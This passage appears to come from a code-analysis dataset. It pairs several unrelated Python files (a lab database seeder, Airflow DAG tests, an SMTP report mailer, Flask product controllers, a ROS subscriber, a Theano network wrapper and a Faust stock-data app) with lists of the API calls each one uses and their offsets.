default sequence with three cassettes
that contain no reagents.
'''
metadata.create_all(checkfirst=True)
role = create_role()
user = create_user(role.RoleID)
sequence = create_sequence(user.UserID)
cassettes = create_cassette_components(sequence.SequenceID)
create_reagents(sequence.SequenceID, cassettes)
update_sequence_details(sequence)
update_component_details(cassettes)
from IPython import embed
embed()
|
[
"pyelixys.web.database.model.Roles",
"pyelixys.web.database.model.Reagents",
"hashlib.md5",
"pyelixys.web.database.model.Sequence",
"pyelixys.web.database.model.User",
"pyelixys.web.database.model.session.add",
"IPython.embed",
"pyelixys.web.database.model.Component",
"pyelixys.web.database.model.metadata.create_all",
"pyelixys.web.database.model.session.query",
"pyelixys.web.database.model.session.commit"
] |
[((545, 572), 'pyelixys.web.database.model.Roles', 'Roles', (['"""Administrator"""', '(255)'], {}), "('Administrator', 255)\n", (550, 572), False, 'from pyelixys.web.database.model import Roles\n'), ((577, 594), 'pyelixys.web.database.model.session.add', 'session.add', (['role'], {}), '(role)\n', (588, 594), False, 'from pyelixys.web.database.model import session\n'), ((599, 615), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (613, 615), False, 'from pyelixys.web.database.model import session\n'), ((2361, 2367), 'pyelixys.web.database.model.User', 'User', ([], {}), '()\n', (2365, 2367), False, 'from pyelixys.web.database.model import User\n'), ((2678, 2699), 'pyelixys.web.database.model.session.add', 'session.add', (['new_user'], {}), '(new_user)\n', (2689, 2699), False, 'from pyelixys.web.database.model import session\n'), ((2704, 2720), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (2718, 2720), False, 'from pyelixys.web.database.model import session\n'), ((2828, 2838), 'pyelixys.web.database.model.Sequence', 'Sequence', ([], {}), '()\n', (2836, 2838), False, 'from pyelixys.web.database.model import Sequence\n'), ((2971, 2991), 'pyelixys.web.database.model.session.add', 'session.add', (['new_seq'], {}), '(new_seq)\n', (2982, 2991), False, 'from pyelixys.web.database.model import session\n'), ((2996, 3012), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (3010, 3012), False, 'from pyelixys.web.database.model import session\n'), ((4384, 4400), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (4398, 4400), False, 'from pyelixys.web.database.model import session\n'), ((5049, 5085), 'pyelixys.web.database.model.metadata.create_all', 'metadata.create_all', ([], {'checkfirst': '(True)'}), '(checkfirst=True)\n', (5068, 5085), False, 'from pyelixys.web.database.model import metadata\n'), ((5419, 5426), 'IPython.embed', 'embed', ([], {}), '()\n', (5424, 5426), False, 'from IPython import embed\n'), ((3196, 3207), 'pyelixys.web.database.model.Component', 'Component', ([], {}), '()\n', (3205, 3207), False, 'from pyelixys.web.database.model import Component\n'), ((3394, 3415), 'pyelixys.web.database.model.session.add', 'session.add', (['new_comp'], {}), '(new_comp)\n', (3405, 3415), False, 'from pyelixys.web.database.model import session\n'), ((3424, 3440), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (3438, 3440), False, 'from pyelixys.web.database.model import session\n'), ((4741, 4757), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (4755, 4757), False, 'from pyelixys.web.database.model import session\n'), ((2424, 2444), 'hashlib.md5', 'hashlib.md5', (['"""devel"""'], {}), "('devel')\n", (2435, 2444), False, 'import hashlib\n'), ((3733, 3743), 'pyelixys.web.database.model.Reagents', 'Reagents', ([], {}), '()\n', (3741, 3743), False, 'from pyelixys.web.database.model import Reagents\n'), ((3938, 3958), 'pyelixys.web.database.model.session.add', 'session.add', (['reagent'], {}), '(reagent)\n', (3949, 3958), False, 'from pyelixys.web.database.model import session\n'), ((3971, 3987), 'pyelixys.web.database.model.session.commit', 'session.commit', ([], {}), '()\n', (3985, 3987), False, 'from pyelixys.web.database.model import session\n'), ((4178, 4202), 'pyelixys.web.database.model.session.query', 'session.query', (['Component'], {}), '(Component)\n', (4191, 4202), False, 'from pyelixys.web.database.model import session\n')]
|
from os import path
from dbt_airflow_factory.airflow_dag_factory import AirflowDagFactory
from dbt_airflow_factory.operator import EphemeralOperator
from tests.utils import task_group_prefix_builder, test_dag
def _get_ephemeral_name(model_name: str) -> str:
return f"{model_name}__ephemeral"
def test_ephemeral_dag_factory():
# given
factory = AirflowDagFactory(
path.dirname(path.abspath(__file__)), "ephemeral_operator"
)
# when
dag = factory.create()
# then
assert len(dag.tasks) == 15
task_group_names = [
el
for node_name in ["model1", "model4", "model6"]
for el in [
task_group_prefix_builder(node_name, "test"),
task_group_prefix_builder(node_name, "run"),
]
]
ephemeral_task_names = [
node_name + "__ephemeral"
for node_name in [
"model2",
"model3",
"model5",
"model7",
"model8",
"model9",
"model10",
]
]
assert set(dag.task_ids) == set(
["dbt_seed", "end"] + task_group_names + ephemeral_task_names
)
for ephemeral_task_name in ephemeral_task_names:
assert isinstance(dag.task_dict[ephemeral_task_name], EphemeralOperator)
def test_ephemeral_tasks():
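    # Parse the manifest inside a test DAG and check the wiring between task groups and ephemeral tasks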
with test_dag():
factory = AirflowDagFactory(
path.dirname(path.abspath(__file__)), "ephemeral_operator"
)
tasks = factory._builder.parse_manifest_into_tasks(
factory._manifest_file_path(factory.read_config())
)
# then
assert (
task_group_prefix_builder("model1", "test")
in tasks.get_task("model.dbt_test.model1").run_airflow_task.downstream_task_ids
)
assert (
task_group_prefix_builder("model1", "run")
in tasks.get_task("model.dbt_test.model1").test_airflow_task.upstream_task_ids
)
assert (
task_group_prefix_builder("model1", "test")
in tasks.get_task("model.dbt_test.model2").run_airflow_task.upstream_task_ids
)
assert (
"model2__ephemeral"
in tasks.get_task("model.dbt_test.model1").test_airflow_task.downstream_task_ids
)
assert (
"model2__ephemeral"
in tasks.get_task("model.dbt_test.model3").run_airflow_task.upstream_task_ids
)
assert (
"model3__ephemeral"
in tasks.get_task("model.dbt_test.model5").run_airflow_task.downstream_task_ids
)
assert (
"model3__ephemeral"
in tasks.get_task("model.dbt_test.model10").run_airflow_task.upstream_task_ids
)
assert (
"model9__ephemeral"
in tasks.get_task("model.dbt_test.model10").run_airflow_task.upstream_task_ids
)
assert (
"model10__ephemeral"
in tasks.get_task("model.dbt_test.model3").run_airflow_task.downstream_task_ids
)
assert (
"model10__ephemeral"
in tasks.get_task("model.dbt_test.model9").run_airflow_task.downstream_task_ids
)
|
[
"tests.utils.task_group_prefix_builder",
"os.path.abspath",
"tests.utils.test_dag"
] |
[((1328, 1338), 'tests.utils.test_dag', 'test_dag', ([], {}), '()\n', (1336, 1338), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((1624, 1667), 'tests.utils.task_group_prefix_builder', 'task_group_prefix_builder', (['"""model1"""', '"""test"""'], {}), "('model1', 'test')\n", (1649, 1667), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((1783, 1825), 'tests.utils.task_group_prefix_builder', 'task_group_prefix_builder', (['"""model1"""', '"""run"""'], {}), "('model1', 'run')\n", (1808, 1825), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((1941, 1984), 'tests.utils.task_group_prefix_builder', 'task_group_prefix_builder', (['"""model1"""', '"""test"""'], {}), "('model1', 'test')\n", (1966, 1984), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((401, 423), 'os.path.abspath', 'path.abspath', (['__file__'], {}), '(__file__)\n', (413, 423), False, 'from os import path\n'), ((661, 705), 'tests.utils.task_group_prefix_builder', 'task_group_prefix_builder', (['node_name', '"""test"""'], {}), "(node_name, 'test')\n", (686, 705), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((719, 762), 'tests.utils.task_group_prefix_builder', 'task_group_prefix_builder', (['node_name', '"""run"""'], {}), "(node_name, 'run')\n", (744, 762), False, 'from tests.utils import task_group_prefix_builder, test_dag\n'), ((1402, 1424), 'os.path.abspath', 'path.abspath', (['__file__'], {}), '(__file__)\n', (1414, 1424), False, 'from os import path\n')]
|
import os
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from gottesdienstplan import GoDiPlanChecker
MAIL_TEXT_TEMPLATE = """
Hallo,
im Gottesdienstplan scheint es einen Fehler, bzw. einen fehlenden Eintrag zu geben.
Bitte ergänze die fehlende Information oder korrigiere den falschen Eintrag.
Um was es sich genau handelt:
{message}
Liebe Grüße
Dein freundlicher Gottesdienstplan Checker
"""
MAIL_HTML_TEMPLATE = """
<p>Hallo,</p>
<p>
im Gottesdienstplan scheint es einen Fehler, bzw. einen fehlenden Eintrag zu geben.
Bitte ergänze die fehlende Information oder korrigiere den falschen Eintrag.
</p>
<p>
Um was es sich genau handelt:
</p>
<p><em>
{message}
</em></p>
<p>Liebe Grüße</p>
<p>Dein freundlicher Gottesdienstplan Checker</p>
"""
class Mailer:
def __init__(self, my_addr, port: int = 25):
self._server = None
self._my_addr = my_addr
self._port = port
def __enter__(self):
self._server = smtplib.SMTP("localhost", port=self._port)
return self
def __exit__(self, type, value, traceback):
self._server.quit()
self._server = None
def handle_check_report(self, data):
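        # Build a multipart (plain text + HTML) mail and send it to the recipient, with the webmaster in CC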
msg = data["message"]
recp = data["recipient"]
cc = f"webmaster@{MAIL_DOMAIN}"
mail = MIMEMultipart("alternative")
mail["Subject"] = "Gottesdienstplan Checker Nachricht"
mail["From"] = self._my_addr
mail["To"] = recp
mail["Cc"] = cc
mail.attach(MIMEText(MAIL_TEXT_TEMPLATE.format(message=msg), "plain"))
mail.attach(MIMEText(MAIL_HTML_TEMPLATE.format(message=msg), "html"))
self._server.send_message(
to_addrs=recp,
from_addr=self._my_addr,
msg=mail,
)
if __name__ == "__main__":
MAIL_DOMAIN = os.environ.get("MAIL_DOMAIN")
p = GoDiPlanChecker(mail_domain=MAIL_DOMAIN)
if MAIL_DOMAIN:
with Mailer(my_addr=f"godiplanchecker@{MAIL_DOMAIN}", port=25) as m:
p.check("1w", report=m.handle_check_report)
else:
p.check("1w", report=print)
|
[
"os.environ.get",
"email.mime.multipart.MIMEMultipart",
"smtplib.SMTP",
"gottesdienstplan.GoDiPlanChecker"
] |
[((1848, 1877), 'os.environ.get', 'os.environ.get', (['"""MAIL_DOMAIN"""'], {}), "('MAIL_DOMAIN')\n", (1862, 1877), False, 'import os\n'), ((1887, 1927), 'gottesdienstplan.GoDiPlanChecker', 'GoDiPlanChecker', ([], {'mail_domain': 'MAIL_DOMAIN'}), '(mail_domain=MAIL_DOMAIN)\n', (1902, 1927), False, 'from gottesdienstplan import GoDiPlanChecker\n'), ((1006, 1048), 'smtplib.SMTP', 'smtplib.SMTP', (['"""localhost"""'], {'port': 'self._port'}), "('localhost', port=self._port)\n", (1018, 1048), False, 'import smtplib\n'), ((1334, 1362), 'email.mime.multipart.MIMEMultipart', 'MIMEMultipart', (['"""alternative"""'], {}), "('alternative')\n", (1347, 1362), False, 'from email.mime.multipart import MIMEMultipart\n')]
|
# All of the project's routes live in this module
from flask import request, render_template, redirect, flash
from flask.views import MethodView  # this module provides the MethodView class logic
from src.db import mysql
class IndexController(MethodView):  # inherits from MethodView
def get(self):
with mysql.cursor() as cur:
cur.execute("SELECT * FROM products")
            data = cur.fetchall()  # fetch every row of the table as a tuple and store it in data
cur.execute("SELECT * FROM categories")
categories = cur.fetchall()
        return render_template('public/index.html', data=data, categories=categories)  # render the HTML template, passing in the table data
def post(self):
code = request.form['code']
name = request.form['name']
stock = request.form['stock']
value = request.form['value']
category = request.form['category']
        # Save the form data into the products table of the database
        with mysql.cursor() as cur:  # alias the mysql.cursor() statement as cur
try:
cur.execute("INSERT INTO products VALUES(%s, %s, %s, %s, %s)", (code, name, stock, value, category)) #Inserto los valores del formulario a la tabla de la base de datos
cur.connection.commit() #Ejecucion de la sentencia
flash("El producto ha sido agregado correctamente", "success")
except:
flash("Un error ha ocurrido","error")
        return redirect('/')  # return to the main page - Index
class DeleteProductController(MethodView):
def post(self, code):
with mysql.cursor() as cur:
try:
cur.execute("DELETE FROM products WHERE code = %s", (code, ))
                cur.connection.commit()  # execute the statement
flash("El producto ha sido eliminado correctamente", "success")
except:
flash("Un error ha ocurrido", "error")
        return redirect('/')  # return to the main page - Index
class UpdateProductController(MethodView):
def get(self, code):
with mysql.cursor() as cur:
cur.execute("SELECT * FROM products WHERE code = %s", (code, ))
            product = cur.fetchone()  # fetch the first row matching the SQL condition
return render_template('public/update.html', product = product)
def post(self, code):
productCode = request.form['code']
name = request.form['name']
stock = request.form['stock']
value = request.form['value']
with mysql.cursor() as cur:
try:
cur.execute("UPDATE products SET code = %s, name = %s, stock = %s, value = %s WHERE code = %s", (productCode, name, stock, value, code))
cur.connection.commit()
flash("El producto ha sido actualizado correctamente", "success")
except:
flash("Un error ha ocurrido", "error")
return redirect('/')
class CreateCategoriesController(MethodView):
def get(self):
return render_template("public/categories.html")
def post(self):
id = request.form['id']
name = request.form['name']
description = request.form['description']
with mysql.cursor() as cur:
try:
cur.execute("INSERT INTO categories VALUES(%s, %s, %s)", (id, name, description))
cur.connection.commit()
flash("La categoria se ha creado!", "success")
except:
flash("Un error ha ocurrido", "error")
return redirect('/')
|
[
"src.db.mysql.cursor",
"flask.redirect",
"flask.flash",
"flask.render_template"
] |
[((3247, 3288), 'flask.render_template', 'render_template', (['"""public/categories.html"""'], {}), "('public/categories.html')\n", (3262, 3288), False, 'from flask import request, render_template, redirect, flash\n'), ((324, 338), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (336, 338), False, 'from src.db import mysql\n'), ((624, 694), 'flask.render_template', 'render_template', (['"""public/index.html"""'], {'data': 'data', 'categories': 'categories'}), "('public/index.html', data=data, categories=categories)\n", (639, 694), False, 'from flask import request, render_template, redirect, flash\n'), ((1121, 1135), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (1133, 1135), False, 'from src.db import mysql\n'), ((1629, 1642), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (1637, 1642), False, 'from flask import request, render_template, redirect, flash\n'), ((1766, 1780), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (1778, 1780), False, 'from src.db import mysql\n'), ((2127, 2140), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (2135, 2140), False, 'from flask import request, render_template, redirect, flash\n'), ((2269, 2283), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (2281, 2283), False, 'from src.db import mysql\n'), ((2490, 2544), 'flask.render_template', 'render_template', (['"""public/update.html"""'], {'product': 'product'}), "('public/update.html', product=product)\n", (2505, 2544), False, 'from flask import request, render_template, redirect, flash\n'), ((2743, 2757), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (2755, 2757), False, 'from src.db import mysql\n'), ((3152, 3165), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (3160, 3165), False, 'from flask import request, render_template, redirect, flash\n'), ((3442, 3456), 'src.db.mysql.cursor', 'mysql.cursor', ([], {}), '()\n', (3454, 3456), False, 'from src.db import mysql\n'), ((3781, 3794), 'flask.redirect', 'redirect', (['"""/"""'], {}), "('/')\n", (3789, 3794), False, 'from flask import request, render_template, redirect, flash\n'), ((1473, 1535), 'flask.flash', 'flash', (['"""El producto ha sido agregado correctamente"""', '"""success"""'], {}), "('El producto ha sido agregado correctamente', 'success')\n", (1478, 1535), False, 'from flask import request, render_template, redirect, flash\n'), ((1969, 2032), 'flask.flash', 'flash', (['"""El producto ha sido eliminado correctamente"""', '"""success"""'], {}), "('El producto ha sido eliminado correctamente', 'success')\n", (1974, 2032), False, 'from flask import request, render_template, redirect, flash\n'), ((2992, 3057), 'flask.flash', 'flash', (['"""El producto ha sido actualizado correctamente"""', '"""success"""'], {}), "('El producto ha sido actualizado correctamente', 'success')\n", (2997, 3057), False, 'from flask import request, render_template, redirect, flash\n'), ((3640, 3686), 'flask.flash', 'flash', (['"""La categoria se ha creado!"""', '"""success"""'], {}), "('La categoria se ha creado!', 'success')\n", (3645, 3686), False, 'from flask import request, render_template, redirect, flash\n'), ((1572, 1610), 'flask.flash', 'flash', (['"""Un error ha ocurrido"""', '"""error"""'], {}), "('Un error ha ocurrido', 'error')\n", (1577, 1610), False, 'from flask import request, render_template, redirect, flash\n'), ((2069, 2107), 'flask.flash', 'flash', (['"""Un error ha ocurrido"""', '"""error"""'], {}), "('Un error ha ocurrido', 'error')\n", (2074, 2107), False, 'from flask import request, render_template, redirect, flash\n'), ((3094, 3132), 'flask.flash', 'flash', (['"""Un error ha ocurrido"""', '"""error"""'], {}), "('Un error ha ocurrido', 'error')\n", (3099, 3132), False, 'from flask import request, render_template, redirect, flash\n'), ((3723, 3761), 'flask.flash', 'flash', (['"""Un error ha ocurrido"""', '"""error"""'], {}), "('Un error ha ocurrido', 'error')\n", (3728, 3761), False, 'from flask import request, render_template, redirect, flash\n')]
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import rospy
from sample_py.msg import sample_message
def callback(msg):
    rospy.loginfo("I heard: message = [%s], count = [%d]" % (msg.message, msg.count))
def subscriber():
rospy.init_node('sample_py_subscriber', anonymous=True)
rospy.Subscriber('sample_topic', sample_message, callback)
rospy.spin()
if __name__ == '__main__':
subscriber()
|
[
"rospy.loginfo",
"rospy.spin",
"rospy.Subscriber",
"rospy.init_node"
] |
[((122, 208), 'rospy.loginfo', 'rospy.loginfo', (["('I heard: message = [%s], count = [%d]' % (msg.message, msg.count))"], {}), "('I heard: message = [%s], count = [%d]' % (msg.message, msg.\n count))\n", (135, 208), False, 'import rospy\n'), ((229, 284), 'rospy.init_node', 'rospy.init_node', (['"""sample_py_subscriber"""'], {'anonymous': '(True)'}), "('sample_py_subscriber', anonymous=True)\n", (244, 284), False, 'import rospy\n'), ((290, 348), 'rospy.Subscriber', 'rospy.Subscriber', (['"""sample_topic"""', 'sample_message', 'callback'], {}), "('sample_topic', sample_message, callback)\n", (306, 348), False, 'import rospy\n'), ((354, 366), 'rospy.spin', 'rospy.spin', ([], {}), '()\n', (364, 366), False, 'import rospy\n')]
|
import numpy as np
import theano
import lasagne
## ALIASES ##
L = lasagne.layers
T = theano.tensor
get_output = L.get_output
get_all_params = L.get_all_params
cross_entropy = lasagne.objectives.categorical_crossentropy
get_layers = L.get_all_layers
class Network(object):
"""
Wrapper for neural networks for MNK that automates network compilation and
    provides some convenience functions for freezing, saving, and loading params
Things to consider doing:
mod save/load to use named layers
add self.reinitialize(layers)
"""
def __init__(self, architecture):
self.architecture = architecture
self.input_var = T.tensor4('inputs')
self.target_var = T.ivector('targets')
self.update_algo = lasagne.updates.adam # just a default
self.build()
self.objectives()
self.compile_functions()
self.val_trace = np.zeros(500)
self.train_trace = np.zeros(500)
self.trace_loc = 0
def build(self):
"""
Generates network graph, grabs params and output symbols
"""
self.net = self.architecture(self.input_var)
self.prediction = get_output(self.net)
self.test_prediction = get_output(self.net, deterministic=True)
self.params = get_all_params(self.net, trainable=True)
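        # The value head sits four layers from the end of the network graph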
self.value_layer = get_layers(self.net)[-4]
self.value_prediction = get_output(self.value_layer)
return None
def objectives(self):
"""
Adds loss and accuracy nodes
"""
self.loss = cross_entropy(self.prediction, self.target_var)
self.loss = self.loss.mean()
self.itemized_loss = cross_entropy(self.test_prediction, self.target_var)
self.test_loss = self.itemized_loss.mean()
self.test_acc = T.mean(
T.eq(T.argmax(self.test_prediction, axis=1), self.target_var),
dtype=theano.config.floatX
)
self.updates = self.update_algo(self.loss, self.params)
return None
def compile_functions(self):
"""
Compiles theano functions for computing output, losses, etc
"""
self.output_fn = theano.function([self.input_var], self.test_prediction)
self.value_fn = theano.function([self.input_var], self.value_prediction)
self.train_fn = theano.function(
[self.input_var, self.target_var], self.loss,
updates=self.updates
)
self.test_fn = theano.function(
[self.input_var, self.target_var],
[self.test_loss, self.test_acc]
)
self.itemized_test_fn = theano.function(
[self.input_var, self.target_var],
self.itemized_loss
)
return None
def update_traces(self):
"""
Saves traces for plotting
"""
self.val_trace[self.trace_loc] = self.val_err
self.train_trace[self.trace_loc] = self.train_err
self.trace_loc += 1 # so hacky
return None
def freeze_params(self, net=None, exclude=None):
"""
Sets params to be untrainable
Excludes layers in optional arg exclude (tuple or list)
"""
if net is None:
net = self.net
layers = get_layers(net)
num_layers = len(layers)
        if exclude is not None:
            # normalize negative indices before filtering them out
            exclude = [i if i >= 0 else num_layers + i for i in exclude]
            layers = [layer for l, layer in enumerate(layers) if l not in exclude]
for layer in layers:
for param in layer.params:
layer.params[param].remove('trainable')
        self.params = get_all_params(net, trainable=True)  # CAUTION: needs to be rewritten so it does not throw errors as autoencoders develop
return None
def unfreeze_params(self):
"""
Sets all parameters back to trainable
"""
for layer in L.get_all_layers(self.net):
for param in layer.params:
layer.params[param].add('trainable')
self.params = L.get_all_params(self.net, trainable=True)
return None
def save_params(self, param_file):
"""
Save parameters for reuse later
"""
all_params = L.get_all_param_values(self.net)
np.savez(param_file, *all_params)
return None
def load_params(self, paramsfile):
"""
Loads parameters from npz files
"""
with np.load(paramsfile) as loaded:
params_list = [(i[0], i[1]) for i in loaded.items()]
params_order = np.array([i[0][4:6] for i in params_list]).astype(int)
params_list = [params_list[i] for i in params_order.argsort()]
L.set_all_param_values(self.net, [i[1] for i in params_list])
return None
class Autoencoder(Network):
"""
Wrapper for training and testing transfer learning with an autoencoder.
Almost as cool as it sounds.
Later, use super() to cut down bloat inside functions
"""
def __init__(self, architecture):
self.architecture = architecture
self.input_var = T.tensor4('inputs')
self.target_var = T.ivector('targets')
self.ae_target_var = T.tensor4('ae inputs')
self.update_algo = lasagne.updates.adam
self.val_trace = []
self.train_trace = []
self.build()
self.objectives()
self.compile_functions()
def build(self):
"""Generates graph, caches params, output symbols"""
self.autoencoder, self.value_layer, self.net = self.architecture(self.input_var)
self.prediction = get_output(self.net)
self.test_prediction = get_output(self.net, deterministic=True)
self.value_prediction = get_output(self.value_layer)
self.image = get_output(self.autoencoder)
self.test_image = get_output(self.autoencoder, deterministic=True)
self.params = get_all_params(self.net)
self.ae_params = get_all_params(self.autoencoder)
return None
def objectives(self):
"""Loss functions, etc"""
self.loss = cross_entropy(self.prediction, self.target_var).mean()
self.itemized_test_loss = cross_entropy(self.test_prediction, self.target_var)
self.test_loss = self.itemized_test_loss.mean()
self.test_acc = T.mean(
T.eq(T.argmax(self.test_prediction, axis=1), self.target_var),
dtype=theano.config.floatX
)
self.updates = self.update_algo(self.loss, self.params)
self.ae_loss = T.mean((self.ae_target_var - self.image)**2, dtype=theano.config.floatX)
self.ae_test_loss = T.mean((self.ae_target_var - self.test_image)**2, dtype=theano.config.floatX)
self.ae_updates = self.update_algo(self.ae_loss, self.ae_params)
return None
def compile_functions(self):
"""Compile theano functions"""
self.output_fn = theano.function([self.input_var], self.test_prediction)
self.value_fn = theano.function([self.input_var], self.value_prediction)
self.train_fn = theano.function(
[self.input_var, self.target_var],
self.loss,
updates = self.updates
)
self.test_fn = theano.function(
[self.input_var, self.target_var],
[self.test_loss, self.test_acc]
)
self.itemized_test_fn = theano.function(
[self.input_var, self.target_var],
self.itemized_test_loss
)
self.ae_output_fn = theano.function([self.input_var], self.test_image)
self.ae_train_fn = theano.function(
[self.input_var, self.ae_target_var],
self.ae_loss,
updates=self.ae_updates
)
self.ae_test_fn = theano.function(
[self.input_var, self.ae_target_var],
self.ae_test_loss
)
return None
|
[
"numpy.load",
"theano.function",
"numpy.zeros",
"numpy.array",
"numpy.savez"
] |
[((904, 917), 'numpy.zeros', 'np.zeros', (['(500)'], {}), '(500)\n', (912, 917), True, 'import numpy as np\n'), ((945, 958), 'numpy.zeros', 'np.zeros', (['(500)'], {}), '(500)\n', (953, 958), True, 'import numpy as np\n'), ((2183, 2238), 'theano.function', 'theano.function', (['[self.input_var]', 'self.test_prediction'], {}), '([self.input_var], self.test_prediction)\n', (2198, 2238), False, 'import theano\n'), ((2263, 2319), 'theano.function', 'theano.function', (['[self.input_var]', 'self.value_prediction'], {}), '([self.input_var], self.value_prediction)\n', (2278, 2319), False, 'import theano\n'), ((2344, 2432), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', 'self.loss'], {'updates': 'self.\n updates'}), '([self.input_var, self.target_var], self.loss, updates=self.\n updates)\n', (2359, 2432), False, 'import theano\n'), ((2485, 2573), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', '[self.test_loss, self.test_acc]'], {}), '([self.input_var, self.target_var], [self.test_loss, self.\n test_acc])\n', (2500, 2573), False, 'import theano\n'), ((2635, 2705), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', 'self.itemized_loss'], {}), '([self.input_var, self.target_var], self.itemized_loss)\n', (2650, 2705), False, 'import theano\n'), ((4281, 4314), 'numpy.savez', 'np.savez', (['param_file', '*all_params'], {}), '(param_file, *all_params)\n', (4289, 4314), True, 'import numpy as np\n'), ((6921, 6976), 'theano.function', 'theano.function', (['[self.input_var]', 'self.test_prediction'], {}), '([self.input_var], self.test_prediction)\n', (6936, 6976), False, 'import theano\n'), ((7001, 7057), 'theano.function', 'theano.function', (['[self.input_var]', 'self.value_prediction'], {}), '([self.input_var], self.value_prediction)\n', (7016, 7057), False, 'import theano\n'), ((7082, 7170), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', 'self.loss'], {'updates': 'self.\n updates'}), '([self.input_var, self.target_var], self.loss, updates=self.\n updates)\n', (7097, 7170), False, 'import theano\n'), ((7238, 7326), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', '[self.test_loss, self.test_acc]'], {}), '([self.input_var, self.target_var], [self.test_loss, self.\n test_acc])\n', (7253, 7326), False, 'import theano\n'), ((7389, 7464), 'theano.function', 'theano.function', (['[self.input_var, self.target_var]', 'self.itemized_test_loss'], {}), '([self.input_var, self.target_var], self.itemized_test_loss)\n', (7404, 7464), False, 'import theano\n'), ((7528, 7578), 'theano.function', 'theano.function', (['[self.input_var]', 'self.test_image'], {}), '([self.input_var], self.test_image)\n', (7543, 7578), False, 'import theano\n'), ((7606, 7703), 'theano.function', 'theano.function', (['[self.input_var, self.ae_target_var]', 'self.ae_loss'], {'updates': 'self.ae_updates'}), '([self.input_var, self.ae_target_var], self.ae_loss, updates\n =self.ae_updates)\n', (7621, 7703), False, 'import theano\n'), ((7772, 7844), 'theano.function', 'theano.function', (['[self.input_var, self.ae_target_var]', 'self.ae_test_loss'], {}), '([self.input_var, self.ae_target_var], self.ae_test_loss)\n', (7787, 7844), False, 'import theano\n'), ((4452, 4471), 'numpy.load', 'np.load', (['paramsfile'], {}), '(paramsfile)\n', (4459, 4471), True, 'import numpy as np\n'), ((4575, 4617), 'numpy.array', 'np.array', (['[i[0][4:6] for i in params_list]'], {}), '([i[0][4:6] for i in params_list])\n', (4583, 4617), True, 'import numpy as np\n')]
|
import logging
import os
from datetime import timedelta
import alpaca_trade_api
import faust
from alpaca_trade_api.common import URL
from faust import Worker
app = faust.App(
'stock-app',
broker='kafka://localhost:9092',
value_serializer='json',
store='rocksdb://',
version=1,
)
ALPACA_BASE_URL = URL('https://paper-api.alpaca.markets')
alpaca_ws_url = URL('wss://data.alpaca.markets')
ALPACA_API_KEY = os.getenv('alpaca_key_id')
ALPACA_SECRET_KEY = os.getenv('alpaca_secret_key')
alpaca = alpaca_trade_api.REST(ALPACA_API_KEY, ALPACA_SECRET_KEY, ALPACA_BASE_URL, api_version='v2')
class OHLCRecord(faust.Record, serializer='json'):
Name: str
datetime: str
Open: float
High: float
Low: float
Close: float
Volume: float
stock_market_topic = app.topic('stockmarket-topic', key_type=OHLCRecord, value_type=OHLCRecord, partitions=2)
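# Tumbling 10-second windows over the stock stream, expired after 60 seconds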
stock_market_table = app.Table(name='stockmarket-table', default=float, partitions=10).tumbling(
size=timedelta(seconds=10), expires=timedelta(seconds=60))
stock_order_topic = app.topic('stock-order-topic', key_type=str, value_type=str, partitions=10)
@app.timer(interval=1)
async def get_ohlc():
    FAANG_STOCKS = ['FB', 'AMZN', 'AAPL', 'NFLX', 'GOOG']
df = alpaca.get_latest_bars(symbols=FAANG_STOCKS)
for name, bar in df.items():
record = OHLCRecord(
Name=name,
datetime=bar.t,
Open=bar.o,
Close=bar.c,
High=bar.h,
Low=bar.l,
Volume=bar.v
)
# logging.info(record)
await stock_market_topic.send(key=record, value=record)
@app.timer(interval=10)
async def back_test():
key = 'stock_name'
action = 'buy'
await stock_order_topic.send(key=key, value=action)
@app.agent(stock_order_topic, concurrency=10, isolated_partitions=False)
async def handle_order(orders):
async for key, order in orders.items():
logging.info(f'Send Order {key} to {order}')
if __name__ == '__main__':
worker = Worker(app=app, loglevel=logging.INFO)
worker.execute_from_commandline()
|
[
"alpaca_trade_api.REST",
"alpaca_trade_api.common.URL",
"logging.info",
"datetime.timedelta",
"faust.Worker",
"os.getenv",
"faust.App"
] |
[((166, 282), 'faust.App', 'faust.App', (['"""stock-app"""'], {'broker': '"""kafka://localhost:9092"""', 'value_serializer': '"""json"""', 'store': '"""rocksdb://"""', 'version': '(1)'}), "('stock-app', broker='kafka://localhost:9092', value_serializer=\n 'json', store='rocksdb://', version=1)\n", (175, 282), False, 'import faust\n'), ((320, 359), 'alpaca_trade_api.common.URL', 'URL', (['"""https://paper-api.alpaca.markets"""'], {}), "('https://paper-api.alpaca.markets')\n", (323, 359), False, 'from alpaca_trade_api.common import URL\n'), ((376, 408), 'alpaca_trade_api.common.URL', 'URL', (['"""wss://data.alpaca.markets"""'], {}), "('wss://data.alpaca.markets')\n", (379, 408), False, 'from alpaca_trade_api.common import URL\n'), ((426, 452), 'os.getenv', 'os.getenv', (['"""alpaca_key_id"""'], {}), "('alpaca_key_id')\n", (435, 452), False, 'import os\n'), ((473, 503), 'os.getenv', 'os.getenv', (['"""alpaca_secret_key"""'], {}), "('alpaca_secret_key')\n", (482, 503), False, 'import os\n'), ((514, 609), 'alpaca_trade_api.REST', 